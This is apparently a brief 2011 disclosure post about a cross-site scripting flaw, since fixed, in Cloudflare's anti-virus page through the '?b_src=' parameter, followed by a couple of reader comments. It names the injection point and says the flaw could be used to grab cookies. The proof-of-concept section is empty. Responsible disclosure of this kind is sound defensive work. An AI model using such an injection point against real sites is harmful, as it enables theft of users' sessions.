0×1 Site : http://anti-virus.cloudflare.com
0x3 Author : Sandeep Kamble
0×4 Reported : October 12, 2011
0×6 Public Release : October 17 2011
0x7 Status: Fixed
Description :
Anti-virus.cloudflare.com is a service for avoiding spams .
This project to stop attacks and educate visitors with infected computers about how they can clean up their machines.
Affected Variable :
?b_src=
Exploit :
Executing Javascript using the vulnerable variable called as ?b_src= . This attack is commonly know as Cross Site Scripting (XSS)
Anti-virus.cloud + affected script having stored Xss attack which can used for the grabbing the cookies .
POC :
Screen Shot :
Cloud XSS
1) Determine whether HTML output includes input parameters
2) In short perform input sensitization
Conclusion
I like to thank the cloudflare Security Team for their quick responses to my reports.
nice work man !!!
This is my first time go to see at here and i am really impressed to
read all at single place.